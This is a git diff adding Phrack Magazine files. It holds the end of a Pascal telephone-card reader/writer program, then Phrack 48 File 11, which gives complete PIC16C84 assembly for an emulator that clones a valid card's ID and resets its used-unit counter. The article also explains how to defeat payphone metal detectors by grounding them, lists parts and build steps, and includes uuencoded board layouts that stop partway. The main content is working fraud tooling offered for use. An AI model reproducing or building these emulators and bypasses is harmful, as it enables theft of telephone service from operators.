+{                       Snail Mail Address: 4, Rue de Grand                   }
+{                                           F-88630 CHERMISEY                 }
+{                                           France                            }
+{                                                                             }
+{*****************************************************************************}
+{* Thanks to: Tomi Engdahl (Tomi.Engdahl@hut.fi)                             *}
+{*****************************************************************************}
+
+USES crt,dos;
+
+CONST port_address=$378;     { lpr1 chosen }
+
+TYPE string8=string[8];
+     string2=string[2];
+
+VAR reg         : registers;
+    i,j         : integer;
+    Data        : array[1..32] of byte;
+    car         : char;
+    byte_number : integer;
+    displaying  : char;
+
+{-----------------------------------------------------------------------------}
+
+PROCEDURE Send(b:byte);
+
+  BEGIN port[port_address]:=b;
+  END;
+
+{-----------------------------------------------------------------------------}
+
+FUNCTION Get:byte;
+
+  BEGIN get:=port[port_address+1];
+  END;
+
+{-----------------------------------------------------------------------------}
+{ FUNCTION dec2hexa_one(decimal_value):hexa_character_representation;         }
+{                                                                             }
+{       - convert a 4 bit long decimal number to hexadecimal.                 }
+{-----------------------------------------------------------------------------}
+
+FUNCTION dec2hexa_one(value:byte):char;
+
+  BEGIN case value of
+	  0..9   : dec2hexa_one:=chr(value+$30);
+	  10..15 : dec2hexa_one:=chr(value+$37);
+	END;
+  END;
+
+{-----------------------------------------------------------------------------}
+{ FUNCTION d2h(decimal_byte):string2;                                         }
+{                                                                             }
+{       - convert a decimal byte to its hexadecimal representation.           }
+{-----------------------------------------------------------------------------}
+
+FUNCTION d2h(value:byte):string2;
+
+  VAR msbb,lsbb:byte;
+
+  BEGIN msbb:=0;
+	if ( value >= $80 ) then
+	BEGIN msbb:=msbb+8;
+	      value:=value-$80;
+	END;
+	if ( value >= $40 ) then
+	BEGIN msbb:=msbb+4;
+	      value:=value-$40;
+	END;
+	if ( value >= $20 ) then
+	BEGIN msbb:=msbb+2;
+	      value:=value-$20;
+	END;
+	if ( value >= $10 ) then
+	BEGIN msbb:=msbb+1;
+	      value:=value-$10;
+	END;
+
+	lsbb:=0;
+	if ( value >= $08 ) then
+	BEGIN lsbb:=lsbb+8;
+	      value:=value-$08;
+	END;
+	if ( value >= $04 ) then
+	BEGIN lsbb:=lsbb+4;
+	      value:=value-$04;
+	END;
+	if ( value >= $02 ) then
+	BEGIN lsbb:=lsbb+2;
+	      value:=value-$02;
+	END;
+	if ( value >= $01 ) then
+	BEGIN lsbb:=lsbb+1;
+	      value:=value-$01;
+	END;
+	d2h := dec2hexa_one(msbb) + dec2hexa_one(lsbb);
+  END;
+
+{-----------------------------------------------------------------------------}
+
+Function Binary( b : byte):string8;
+
+  var weight : byte;
+      s      : string8;
+
+  BEGIN weight:=$80;
+	s:='';
+	while (weight > 0) do
+	BEGIN if ((b and weight) = weight) then s:=s+'1'
+	      else s:=s+'0';
+	      weight:=weight div $02;
+	END;
+	Binary:=s;
+  END;
+
+{-----------------------------------------------------------------------------}
+
+FUNCTION Units:byte;
+
+  VAR  u, i : integer;
+       s    : string8;
+
+  BEGIN u:=0;
+	i:=13;
+	while (Data[i] = $FF) do
+	BEGIN u:=u+8;
+	      i:=i+1;
+	END;
+	s:=Binary(Data[i]);
+	while(s[1]='1') do
+	      BEGIN inc(u);
+	      s:=copy(s,2,length(s));
+	END;
+	units:=u;
+  END;
+
+{-----------------------------------------------------------------------------}
+
+function Units_2:LongInt;
+
+  BEGIN Units_2:=4096*Data[9]+512*Data[10]+64*Data[11]+8*Data[12]+Data[13];
+  END;
+
+{-----------------------------------------------------------------------------}
+
+PROCEDURE Card_Type;
+
+  BEGIN case Data[2] of
+	 $03: BEGIN write('Telecard - France - ');
+		    case Data[12] of
+		     $13: write('120 Units - ',units-130,' Units left');
+		     $06: write('50 Units - ',units-60,' Units left');
+		     $15: write('40 Units - ',units-40,' Units left');
+		    END;
+	      END;
+	 $2F:BEGIN write('Telecard - Germany - ', Units_2, ' Units left');
+	     END;
+	 $3B:BEGIN write('Telecard - Greece - ', Units_2, ' Units left');
+	     END;
+	 $83:BEGIN write('Telecard');
+		   case Data[12] of
+		     $1E: write(' - Sweden');
+		     $30: write(' - Norway');
+		     $33: write(' - Andorra');
+		     $3C: write(' - Ireland');
+		     $47: write(' - Portugal');
+		     $55: write(' - Czech Republic');
+		     $5F: write(' - Gabon');
+		     $65: write(' - Finland');
+		   END;
+		   if (Data[12] in [$30,$33,$3C,$47,$55,$65]) then
+		   BEGIN case ((Data[3] and $0F)*$100+Data[4]) of
+			  $012: write (' - 10 Units - ',units-12,' Units left');
+			  $024: write (' - 22 Units - ',units-24,' Units left');
+			  $027: write (' - 25 Units - ',units-27,' Units left');
+			  $032: write (' - 30 Units - ',units-32,' Units left');
+			  $052: write (' - 50 Units - ',units-52,' Units left');
+			  $067: write (' - 65 Units - ',units-62,' Units left');
+			  $070: write (' - 70 Units - ',units-70,' Units left');
+			  $102: write (' - 100 Units - ',units-102,' Units left');
+			  $152: write (' - 150 Units -  ',units-152,' Units left');
+			 END;
+		    END;
+{                    write(' - N0 ',Data[5]*$100+Data[6]);}
+	      END;
+	END;
+  END;
+
+{-----------------------------------------------------------------------------}
+
+PROCEDURE waiting;
+
+  BEGIN send($00);
+	write('Enter a card in the reader and press a key ...');
+	repeat until key pressed;
+	gotoxy(1, wherey);
+	clreol;
+  END;
+
+{-----------------------------------------------------------------------------}
+
+PROCEDURE Full_Displaying;
+
+  BEGIN writeln('Memory dump:');
+	for i:=1 to 80 do write('-');
+	for i:=1 to (byte_number div 6 + 1) do
+	BEGIN for j:=1 to 6 do
+	      BEGIN if j+6*(i-1) <= byte_number then write(binary(Data[j+6*(i-1)]):9);
+	      END;
+	      gotoxy(60,wherey);
+	      for j:=1 to 6 do
+	      if j+6*(i-1) <= byte_number then write(d2h(Data[j+6*(i-1)]),' ');
+	      writeln;
+	END;
+	for i:=1 to 80 do write('-');
+	Card_Type;
+	writeln;
+  END;
+
+{-----------------------------------------------------------------------------}
+
+PROCEDURE Short_Displaying;
+
+  VAR j : integer;
+
+  BEGIN for j:=1 to byte_number do
+	BEGIN write(d2h(Data[j]),' ');
+	END;
+	writeln;
+  END;
+
+{-----------------------------------------------------------------------------}
+
+PROCEDURE Reading;
+
+  VAR i, j  : integer;
+      Value : byte;
+
+  BEGIN send($FE);
+	send($F8);
+	for i:=1 to 32 do
+	BEGIN Value:=0;
+	      for j:=1 to 8 do
+	      BEGIN Value:=Value*$02 + ((get and $08) div $08);
+		    send($FB);
+		    delay(1);
+		    send($F8);
+	      END;
+	      Data[i]:=Value;
+	END;
+	case displaying of
+	  'F':full_displaying;
+	  'S':short_displaying;
+	END;
+  END;
+
+{-----------------------------------------------------------------------------}
+
+PROCEDURE writing;
+
+  VAR i,n:integer;
+      car:char;
+
+  BEGIN write('Which bit do you want to set to "1" : ');
+	readln(n);
+
+	waiting;
+	car:=readkey;
+
+	send($FA);
+	send($F8);
+	for i:=1 to n do
+	BEGIN send($F9);
+	      if i=n then
+	      BEGIN send($FD);
+		    delay(20);
+		    send($FF);
+		    delay(20);
+	      END;
+	      send($FB);
+	END;
+	reading;
+  END;
+
+{-----------------------------------------------------------------------------}
+
+PROCEDURE Saving;
+
+  VAR filename : string;
+      f        : text;
+      i        : word;
+
+  BEGIN write('Enter the filename: ');
+	readln(filename);
+	assign(f, filename);
+	rewrite(f);
+	for i:=1 to byte_number do write(f,d2h(Data[i]),' ');
+	close(f);
+  END;
+
+{-----------------------------------------------------------------------------}
+
+PROCEDURE initialize;
+
+  VAR i : integer;
+
+  BEGIN byte_number:=32;
+	displaying:='F';
+	clrscr;
+	writeln(' 1 - to dump a 256 bits card');
+	writeln(' 2 - to dump a 128 bits card');
+	writeln(' F - to display in full format');
+	window(41,1,80,25);
+	writeln(' S  - to display in short format');
+	writeln(' F2 - to save in a file');
+	writeln(' Q  - to exit the program');
+	window(1,4,80,25);
+	for i:=1 to 80 do write('=');
+	window(1,5,80,25);
+  END;
+
+{=============================================================================}
+
+BEGIN initialize;
+      repeat waiting;
+	     car:=upcase(readkey);
+	     case car of
+	      'W':writing;
+	      'Q':;
+	      '1':byte_number:=32;
+	      '2':byte_number:=16;
+	      'F','S':displaying:=car;
+	      #00: BEGIN car:=readkey;
+			 if car=#60 then saving;
+		   END;
+	      else reading;
+	     END;
+      until car='Q';
+END.
+--------------- cut here (end)
+
+
+
+
+
+	_/_/_/_/_/               Stephane BAUSSON
+       _/_/_/_/_/    Engineering student at ENSEM (Nancy - France)
+      _/_/_/_/_/   Smail: 4, Rue de Grand, F-88630 CHERMISEY, France
+     _/_/_/_/_/
+    _/_/_/_/_/            Email: sbausson@ensem.u-nancy.fr
+
+------------------------------------------------------------------------------
+<End of text quoted from Stephane Bausson's text about the telephone cards>.
+
diff --git a/phrack48/11.txt b/phrack48/11.txt
new file mode 100644
index 0000000..87d8775
--- /dev/null
+++ b/phrack48/11.txt
@@ -0,0 +1,1160 @@
+                              ==Phrack Magazine==
+
+                 Volume Seven, Issue Forty-Eight, File 11 of 18
+
+              Electronic Telephone Cards: How to make your own!
+              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                                (continued)
+
+
+
+The Program:
+~~~~~~~~~~~~
+Well, when I saw this phile about the cards the first time, about a year
+ago I quickly realized that this system is very unsecure and really
+needs to be hacked. So, now I present you with a piece of software for
+the PIC 16C84 RISC micro-controller from Microchip that will take care
+of emulating the cards used by Schlumberger and others. This system is
+to be found in Scandinavia (Sweden, Norway and Finland), Spain, France
+and other countries. I do know that France probably needs some small
+modifications for this to work, but I see no reason to as why it
+shouldn't do so! For this to work, you need to have access to a PROM
+burner which can handle the PIC 16C84, or you might just build one
+yourself as I include some plans for that in the UUEncoded block to be
+found at the end of this phile. First of all, you have to read off the
+first 12 bytes of data from a valid card from the country you wish your
+emulator to work in. This because I don't think it would be a good idea
+to publish stolen card identities in Phrack. Then you simply enter those
+12 bytes of data in the proper place in my program and compile it.
+That's it... And since I happen to choose a version of the PIC with
+internal Data EEPROM, that means that the first 12 locations of the Data
+EEPROM should contain the card id bytes. As of today this code should
+work smooth and fine, but maybe you'll need to modify it later on when
+Schlumberger gets tired of my hack. But since the PIC is a very fast and
+powerful micro-controller it might be quite hard for them to come up
+with a solution to this problem. Let's have a look at the PIC Software!
+(Note that the current version of Microchip's PICSTART 16B package is
+unable to program the DATA EEPROM array in the 16C84 so if you are going
+to use that one, use the other version of the source code which you'll
+find in the UUEncoded part!).
+
+<Start of TELECARD.ASM>.
+==============================================================================
+
+	TITLE   "ISO 7816 Synchronous Memory Card Emulator"
+	LIST    P=PIC16C84, R=HEX
+	INCLUDE "PICREG.EQU"
+
+; PIC16C84 I/O Pin Assignment List
+
+CRD_CLK         equ     0       ; RB0 + RA4 = Card Clock
+CRD_DTA         equ     0       ; RA0 = Card Data Output
+CRD_RST         equ     1       ; RB1 = Card Reset, Low-Active
+CRD_WE          equ     7       ; RB7 = Card Write-Enable, Hi-Active
+
+; PIC16C84 RAM Register Assignments
+
+CRD_ID          equ     0x00c   ; Smartcard ID, 12 bytes
+FUSCNT          equ     0x018   ; Fused units counter
+BITCNT          equ     0x019   ; Bitcounter
+LOOPCNT         equ     0x01a   ; Loop Counter
+EE_FLAG         equ     0x01b   ; EEPROM Write Flag
+TEMP1           equ     0x01c   ; Temporary Storage #1
+TEMP2           equ     0x01d   ; Temporary Storage #2
+TEMP3           equ     0x01e   ; Temporary Storage #3
+TEMP4           equ     0x01f   ; Temporary Storage #4
+TEMP_W          equ     0x02e   ; Temporary W Save Address
+TEMP_S          equ     0x02f   ; Temporary STATUS Save Address
+
+	org     0x2000          ; Chip ID Data
+	dw      042,042,042,042
+
+	org     0x2007          ; Configuration Fuses
+	dw      B'00000001'
+
+	org     0x2100          ; Internal Data EEPROM Memory (Card ID!!!)
+	db      0x081,0x042,0x000,0x011,0x022,0x033
+	db      0x044,0x055,0x066,0x077,0x011,0x084
+	db      0x002           ; Default used up credits value
+
+	org     PIC84           ; Reset-vector
+	goto    INIT            ; Jump to initialization routine
+
+	org     INTVEC          ; Interrupt-vector
+	push                    ; Save registers
+	call    INTMAIN         ; Call main interrupt routine
+	pop                     ; Restore registers
+	retfie                  ; return from interrupt & clear flag
+
+	org     0x010           ; Start address for init rout.
+INIT    bsf     STATUS,RP0      ; Access register bank 1
+	clrwdt                  ; Clear watchdog timer
+	movlw   B'11101000'     ; OPTION reg. settings
+	movwf   OPTION          ; Store in OPTION register
+	movlw   B'11111110'     ; Set PORT A Tristate Latches
+	movwf   TRISA           ; Store in PORT A tristate register
+	movlw   B'11111111'     ; Set PORT B Tristate Latches
+	movwf   TRISB           ; Store in PORT B tristate register
+	bcf     STATUS,RP0      ; Access register bank 0
+	clrf    RTCC            ; Clear RTCC
+	clrf    PORTA           ; Clear PORTA
+	clrf    PORTB           ; Clear PORTB
+	movlw   0d              ; 13 bytes to copy
+	movwf   LOOPCNT         ; Store in LOOPCNT
+	movlw   0c              ; Start storing at $0c in RAM
+	movwf   FSR             ; Store in FSR
+	clrf    EEADR           ; Start at EEPROM Address 0
+EECOPY
+	bsf     STATUS,RP0      ; Access register bank 1
+	bsf     EECON1,RD       ; Set EECON1 Read Data Flag
+	bcf     STATUS,RP0      ; Access register bank 0
+	movfw   EEDATA          ; Read one byte of EEPROM Data
+	movwf   INDIR           ; Store in RAM pointed at by FSR
+	incf    FSR             ; Increase FSR pointer
+	incf    EEADR           ; Increase EEPROM Address Pointer
+	decfsz  LOOPCNT,1       ; Decrease LOOPCNT until it's 0
+	goto    EECOPY          ; Go and get some more bytes!
+	bsf     STATUS,RP0      ; Access register bank 1
+	bcf     EECON1,EEIF     ; Clear EEPROM Write Int. Flag
+	bcf     EECON1,WREN     ; EEPROM Write Disable
+	bcf     STATUS,RP0      ; Access register bank 0
+	movlw   B'10010000'     ; Enable INT Interrupt
+	movwf   INTCON          ; Store in INTCON
+
+MAIN    bsf     STATUS,RP0      ; Access register bank 1
+	btfsc   EECON1,WR       ; Check if EEPROM Write Flag Set
+	goto    MAIN            ; Skip if EEPROM Write is Completed
+	bcf     EECON1,EEIF     ; Reset Write Completion Flag
+	bcf     EECON1,WREN     ; EEPROM Write Disable
+	bcf     STATUS,RP0      ; Access register bank 0
+	btfss   EE_FLAG,LSB     ; Check for EEPROM Write Flag
+	goto    MAIN            ; If not set, jump back and wait some more
+	clrf    EE_FLAG         ; Clear EEPROM Write Flag
+	movlw   0c              ; Units is stored in byte $0c
+	movwf   EEADR           ; Store in EEPROM Address Counter
+	movfw   FUSCNT          ; Get fused units counter
+	movwf   EEDATA          ; Store in EEDATA
+	bsf     STATUS,RP0      ; Access register bank 1
+	bsf     EECON1,WREN     ; EEPROM Write Enable
+	bcf     INTCON,GIE      ; Disable all interrupts
+	movlw   055             ; Magic Number #1 for EEPROM Write
+	movwf   EECON2          ; Store in EECON2
+	movlw   0aa             ; Magic Number #2 for EEPROM Write
+	movwf   EECON2          ; Store in EECON2
+	bsf     EECON1,WR       ; Execute EEPROM Write
+	bsf     INTCON,GIE      ; Enable all interrupts again!
+	bcf     STATUS,RP0      ; Access register bank 0
+	goto    MAIN            ; Program main loop!
+
+INTMAIN btfsc   INTCON,INTF     ; Check for INT Interrupt
+	goto    INTMAIN2        ; If set, jump to INTMAIN2
+	movlw   B'00010000'     ; Enable INT Interrupt
+	movwf   INTCON          ; Store in INTCON
+	return
+
+INTMAIN2
+	bcf     STATUS,RP0      ; Access register bank 0
+	bsf     PORTA,CRD_DTA   ; Set Data Output High
+	btfsc   PORTB,CRD_RST   ; Check if reset is low
+	goto    NO_RST          ; If not, skip reset sequence
+	movfw   RTCC            ; Get RTCC Value
+	movwf   TEMP4           ; Store in TEMP4
+	clrf    RTCC            ; Clear RTCC
+	movlw   055             ; Subtract $55 from TEMP4
+	subwf   TEMP4,0         ; to check for card reset....
+	bnz     NO_RST2         ; If not zero, jump to NO_RST
+	movlw   02              ; Unused one has $02 in FUSCNT
+	movwf   FUSCNT          ; Store full value in FUSCNT
+	bsf     EE_FLAG,LSB     ; Set EEPROM Write Flag
+NO_RST2 bcf     INTCON,INTF     ; Clear INT Interrupt Flag
+	return                  ; Mission Accomplished, return to sender
+
+NO_RST  movfw   RTCC            ; Get RTCC Value
+	movwf   BITCNT          ; Copy it to BITCNT
+	movwf   TEMP1           ; Copy it to TEMP1
+	movwf   TEMP2           ; Copy it to TEMP2
+	movlw   060             ; Load W with $60
+	subwf   TEMP1,0         ; Subtract $60 from TEMP1
+	bz      CREDIT          ; If it is equal to $60
+	bc      CREDIT          ; or greater, then skip to units area
+	rrf     TEMP2           ; Rotate TEMP2 one step right
+	rrf     TEMP2           ; Rotate TEMP2 one step right
+	rrf     TEMP2           ; Rotate TEMP2 one step right
+	movlw   0f              ; Load W with $f
+	andwf   TEMP2,1         ; And TEMP2 with W register
+	movfw   TEMP2           ; Load W with TEMP2
+	addlw   0c              ; Add W with $0c
+	movwf   FSR             ; Store data address in FSR
+	movfw   INDIR           ; Get data byte pointed at by FSR
+	movwf   TEMP3           ; Store it in TEMP3
+	movlw   07              ; Load W with $07
+	andwf   TEMP1,1         ; And TEMP1 with $07
+	bz      NO_ROT          ; If result is zero, skip shift loop
+ROTLOOP rlf     TEMP3           ; Shift TEMP3 one step left
+	decfsz  TEMP1,1         ; Decrement TEMP1 until zero
+	goto    ROTLOOP         ; If not zero, repeat until it is!
+NO_ROT  btfss   TEMP3,MSB       ; Check if MSB of TEMP3 is set
+	bcf     PORTA,CRD_DTA   ; Clear Data Output
+	bcf     INTCON,INTF     ; Clear INT Interrupt Flag
+	return                  ; Mission Accomplished, return to sender
+
+CREDIT  btfss   PORTB,CRD_WE    ; Check if Card Write Enable is High
+	goto    NO_WRT          ; Abort write operation if not...
+	btfss   PORTB,CRD_RST   ; Check if Card Reset is High
+	goto    NO_WRT          ; Abort write operation if not...
+	incf    FUSCNT          ; Increase used-up units counter
+	bsf     EE_FLAG,LSB     ; Set EEPROM Write-Flag
+	bcf     INTCON,INTF     ; Clear INT Interrupt Flag
+	return                  ; Mission Accomplished, return to sender
+
+NO_WRT  movlw   060             ; Load W with $60
+	subwf   BITCNT,1        ; Subtract $60 from BITCNT
+	movfw   FUSCNT          ; Load W with FUSCNT
+	subwf   BITCNT,1        ; Subtract FUSCNT from BITCNT
+	bnc     FUSED           ; If result is negative, unit is fused
+	bcf     PORTA,CRD_DTA   ; Clear Data Output
+FUSED   bcf     INTCON,INTF     ; Clear INT Interrupt Flag
+	return                  ; Mission Accomplished, return to sender
+	
+	END
+
+==============================================================================
+<End of TELECARD.ASM>.
+
+<Start of PICREG.EQU>.
+==============================================================================
+
+; PIC16Cxx Micro-controller Include File
+
+PIC54           equ     0x1ff   ; PIC16C54 Reset Vector
+PIC55           equ     0x1ff   ; PIC16C55 Reset Vector
+PIC56           equ     0x3ff   ; PIC16C56 Reset Vector
+PIC57           equ     0x7ff   ; PIC16C57 Reset Vector
+PIC71           equ     0x000   ; PIC16C71 Reset Vector
+PIC84           equ     0x000   ; PIC16C84 Reset Vector
+INTVEC          equ     0x004   ; PIC16C71/84 Interrupt Vector
+
+INDIR           equ     0x000   ; Indirect File Reg Address Register
+RTCC            equ     0x001   ; Real Time Clock Counter
+PCL             equ     0x002   ; Program Counter Low Byte
+STATUS          equ     0x003   ; Status Register
+FSR             equ     0x004   ; File Select Register
+PORTA           equ     0x005   ; Port A I/O Register
+PORTB           equ     0x006   ; Port B I/O Register
+PORTC           equ     0x007   ; Port C I/O Register
+ADCON0          equ     0x008   ; PIC16C71 A/D Control Reg 0
+ADRES           equ     0x009   ; PIC16C71 A/D Converter Result Register
+EEDATA          equ     0x008   ; PIC16C84 EEPROM Data Register
+EEADR           equ     0x009   ; PIC16C84 EEPROM Address Register
+PCLATH          equ     0x00a   ; Program Counter High Bits
+INTCON          equ     0x00b   ; Interrupt Control Register
+TRISA           equ     0x005   ; Port A I/O Direction Register
+TRISB           equ     0x006   ; Port B I/O Direction Register
+TRISC           equ     0x007   ; Port C I/O Direction Register
+ADCON1          equ     0x008   ; PIC16C71 A/D Control Reg 1
+EECON1          equ     0x008   ; PIC16C84 EEPROM Control Reg. 1
+EECON2          equ     0x009   ; PIC16C84 EEPROM Control Reg. 2
+OPTION          equ     0x001   ; Option Register
+
+MSB             equ     0x007   ; Most-Significant Bit
+LSB             equ     0x000   ; Least-Significant Bit
+TRUE            equ     1
+YES             equ     1
+FALSE           equ     0
+NO              equ     0
+
+; Status Register (f03) Bits
+
+CARRY           equ     0x000   ; Carry Bit
+C               equ     0x000   ; Carry Bit
+DCARRY          equ     0x001   ; Digit Carry Bit
+DC              equ     0x001   ; Digit Carry Bit
+Z_BIT           equ     0x002   ; Zero Bit
+Z               equ     0x002   ; Zero Bit
+P_DOWN          equ     0x003   ; Power Down Bit
+PD              equ     0x003   ; Power Down Bit
+T_OUT           equ     0x004   ; Watchdog Time-Out Bit
+TO              equ     0x004   ; Watchdog Time-Out Bit
+RP0             equ     0x005   ; Register Page Select 0
+RP1             equ     0x006   ; Register Page Select 1
+IRP             equ     0x007   ; Indirect Addressing Reg. Page Sel.
+
+; INTCON Register (f0b) Bits
+
+RBIF            equ     0x000   ; RB Port change interrupt flag
+INTF            equ     0x001   ; INT Interrupt Flag
+RTIF            equ     0x002   ; RTCC Overflow Interrupt Flag
+RBIE            equ     0x003   ; RB Port Ch. Interrupt Enable
+INTE            equ     0x004   ; INT Interrupt Enable
+RTIE            equ     0x005   ; RTCC Overflow Int. Enable
+ADIE            equ     0x006   ; PIC16C71 A/D Int. Enable
+EEIE            equ     0x006   ; PIC16C84 EEPROM Write Int. Enable
+GIE             equ     0x007   ; Global Interrupt Enable
+
+; OPTION Register (f81) Bits
+
+PS0             equ     0x000   ; Prescaler Bit 0
+PS1             equ     0x001   ; Prescaler Bit 1
+PS2             equ     0x002   ; Prescaler Bit 2
+PSA             equ     0x003   ; Prescaler Assignment Bit
+RTE             equ     0x004   ; RTCC Signal Edge Select
+RTS             equ     0x005   ; RTCC Signal Source Select
+INTEDG          equ     0x006   ; Interrupt Edge Select
+RBPU            equ     0x007   ; Port B Pull-up Enable
+
+; ADCON0 Register (f08) Bits
+
+ADON            equ     0x000   ; A/D Converter Power Switch
+ADIF            equ     0x001   ; A/D Conversion Interrupt Flag
+ADGO            equ     0x002   ; A/D Conversion Start Flag
+CHS0            equ     0x003   ; A/D Converter Channel Select 0
+CHS1            equ     0x004   ; A/D Converter Channel Select 1
+ADCS0           equ     0x006   ; A/D Conversion Clock Select 0
+ADCS1           equ     0x007   ; A/D Conversion Clock Select 0
+
+; ADCON1 Register (f88) Bits
+
+PCFG0           equ     0x000   ; RA0-RA3 Configuration Bit 0
+PCFG1           equ     0x001   ; RA0-RA3 Configuration Bit 0
+
+; EECON1 Register (f88) Bits
+
+RD              equ     0x000   ; PIC16C84 EEPROM Read Data Flag
+WR              equ     0x001   ; PIC16C84 EEPROM Write Data Flag
+WREN            equ     0x002   ; PIC16C84 EEPROM Write Enable Flag
+WRERR           equ     0x003   ; PIC16C84 EEPROM Write Error Flag
+EEIF            equ     0x004   ; PIC16C84 EEPROM Interrupt Flag
+
+; Some useful macros...
+
+PUSH    macro
+	movwf   TEMP_W
+	swapf   STATUS,W
+	movwf   TEMP_S
+	endm
+
+POP     macro
+	swapf   TEMP_S,W
+	movwf   STATUS
+	swapf   TEMP_W
+	swapf   TEMP_W,W
+	endm
+
+	END
+
+==============================================================================
+<End of PICREG.EQU>.
+
+The Security System:
+~~~~~~~~~~~~~~~~~~~~
+The security of the Schlumberger card system depends strongly on two
+things: the metal detector in the card reader which senses if there is
+any metal on the card where there shouldn't be any metal. Circuit traces
+on a home built card is definitively made of metal. So, we have to
+figure out a way of getting around this problem... Well, that isn't
+really too hard! They made one really big mistake: If the metal detector
+is grounded, it doesn't work!! If you look at the printout of my layouts
+for this card you'll find one big area of the board that is rectangle
+shaped. In this area you should make a big blob of solder that is
+between 2-3 millimeters high (approximately!). When the card slides into
+the phone, the blob should be touching the metal detector and since the
+blob is connected to ground the detector is also being grounded. The
+phone also counts the number of times the metal detector gets triggered
+by foreign objects in the card reader (Meaning that the phone companies
+security staff can see if someone's attempting to use a fake card that
+doesn't have this counter-measure on it!) and this is of course included
+in the daily service report the phone sends to the central computer.
+
+The second security lies in the cards first 12 bytes, it's not just what
+it appears to be: a serial number, it's more than that. Part of the
+first byte is a checksum of the number of 1's in the 11 bytes following
+it. Then byte 2 is always $83, identifying the card as an electronic
+phonecard. Byte 3 and 4 is the number of units on the card: The first
+nibble of byte 3 is always $1 and then in the remaining three nibbles
+the number of units is stored in BCD code, for example $11,$22 means 120
+units (Two units is always fused at the factory as a test, see the text
+by Stephane Bausson!) Then we have 4 bytes of card serial number data, 2
+bytes of card checksum (calculated with a 16 bit key stored in the
+payphone's ROM), 1 byte that is always $11, and then at last, byte 12
+which is the country identifier.
+
+The Parts Needed:
+~~~~~~~~~~~~~~~~~
+	01 * PIC16C84, 4 MHz version, Surface Mounted (SOIC-18 Package)
+	01 * 4 MHz Ceramic Resonator, Surface Mounted
+	02 * 22 pF Capacitors, Surface Mounted (Size 1206).
+	01 * 0.8mm thick single sided circuit board with P20 photoresist
+
+The Construction:
+~~~~~~~~~~~~~~~~~
+Since this project is obviously not intended for the novice in
+electronics I will not go into the basic details of soldering/etching
+circuit boards. If you do not know much of this, ask a friend who does
+for help. If you want to reach me for help, write to Phrack and ask them
+to forward the letter to me as I wish to remain anonymous - This project
+will probably upset a lot of phone companies and last but not least the
+guys at Schlumberger Tech.
+
+The UUEncoded Part:
+~~~~~~~~~~~~~~~~~~~
+In this part of the phile you will find circuit board layouts for Tango
+PCB as well as HP LaserJet binary files which will output the layout
+when printed from DOS with the PRINT command.
+
+You will also find another version of the source code to use if your PIC
+programmer can't handle the programming of the 64 byte Data EEPROM
+array.
+
+<UUEncoded Part Begins Here>.
+------------------------------------------------------------------------------
+
+section 1 of uuencode 5.22 of file telecard.zip    by R.E.M.
+
+begin 644 telecard.zip
+M4$L#!!0````(``Q2,!V^G@!LQ@@``.P@```,````5$5,14-21#$N05--Q5G=
+M<YLZ%G].9O(_G/1VM@_K9L%)D^YD^D`P2;GKV%[LW.P^=620;6TQ4!!QT[]^
+M]8%``NQMLYU;SV0RH//3^=#Y%"?'1PM_,?8`X)4_G\+5>_L2YL])N,G3)"T+
+MN,?;-'\&%^41>-LR1C3-7S'4V)\O&`AF'V:^:U^Z[R\&$'SXZ/V+K?D3=_PP
+M\N`56PJ\NS/OGP\,<G)\#8H6_+]-8482<(J"K),M3BB,24$YE1N,/KGC?X#Z
+MX2^E^&]5S]<0W%CP5PB<"_@@!7/C-/PLD:.%<PCI6`HS0A3!M*19224RD`H9
+M2%OC:2MD@`M,!S!.=V^=D)(G+/&/'G3P5QK^2N$?<T+Q6R]!RQ@/X".I=S$L
+M%#CWC-.:&07GFID*92)_U&5G?;6L4+";;U%.0\[-'PW`'L+RF6*&O7V8NY-%
+M+])^+Y"W98$C*!-""PC3,F'L3XYO_,5>V-\%[(;0FGH\G<YT<IT:">IQFF;@
+M*GK/^W0[=NYZZ9>"WO-FP?1>6@YN8[0^.5YX]S,;^D62-EC@;9;F*'^&.67_
+MUQA^LR5NN`<7[<,-)>Y\#P[OPYU+W,4>W*J-6U2X"XG[]-B+&[;Y/<(</6%P
+MHBC'15%AY_W8+D]G\3!O;7!R?)3FZPHSM"RKV>L:W`W)P!^)"&*$T4XN6!?#
+M@?;7W>3*V"1-5F1=YHB2-!%.5VA[W;RQY,]^8^PS\WEHZ/N(8'S[A$-F<D:X
+M3FG*%_R)K[DK)_R]W&;`%DE"*$$Q^28YYVE)28(-+OYD\8?GZF"?.VJ9:8RR
+MLMA`S^]:6C*O(I<K%:(XKK:]=_R);@2^LD4D85))!HT\1UF:03\'IC,3PF22
+M8[HBN(^:K91Y`JL\W39L_@)AC%$.*Q%+QDE9MF7J0U%.`4G7@%6:"Q,*0<].
+MCI6AE\5*T$MW&@0S2^&=,.1`)2PL4?(9;&Z7.-]%M$]D5\BV0S3<1.D:*-GR
+M-'&T39_BG?`.V[:9F);UI@),9PM_.N$\SJ#`E%EP74C`CHM5+1M*<0,RPS=(
+M(5V;"__57.:8PFP:+,"!1<[($<4PYD)BG=DB\.=.RX(5LPI,%?@05[O#]>9_
+M<;TYP/6FE^LR_*%3L^2I"4RP<+40:4Z-O]?(.'/3&I),O&_1F?(W=#>:?41]
+M,^BJVB#KUH.H6U5E`5(`HO#:"C5#>9XS"OH-5>U494&8I22IS/3CSJT@GN=.
+M)_8@&#7LV'G*MQ!@5#4BLJ:]Y#R87JN=8#1R=$M?R]TKG59]5;VV2;LKT&QB
+M+AT\"-5E\"P;IMFSQJ#=$6@,JJ6#.\L4Q),>2=;5D7)LX-SK6LSU<S6UF`>:
+MK_6Y@,AQM.T"%F].W.GLWTKURM0,KR5VUPE&_DB3Q)^,_#T^QMNZ3#A6Q/DM
+MGRO92"*/OJN$GX0Y1@462UGMDPK05:8&[/7G"(>KXEM]+(.FS1WA"JM.K$PH
+MB8'0-\(8=7U55FFXWJ6`D@C6F!U4NL6PY0H+?SA]802%1@1YGG]K9`:C)_03
+M>M8.H@KX&'@3,U5(R(@4O`-_<=2I=&V)2E07"=G7\V)?=PV&9RS</95(+O%B
+MK+J$EQB-KHI0UUWKVG#X&<BJVTOSC*0=K=&C2!$_DZR#)#S-;K,84QP=/"W1
+MH56@"B%:OC_OL+A1"L%#S!F#<54IE5%X3],S81RPB+^")*4@YL#_\,9RB=@^
+MW/]WB&@!8"0=<\CI=>.*\?Y,*.L;L[WH`"/N-SS&7ESC7+T6B.36K05W[/@.
+MUX]N[='X\:6?4D/W^8:,.,TU9"0-[GRO3FO2?8`G;-4#%[JAW[UK&?H>K4D(
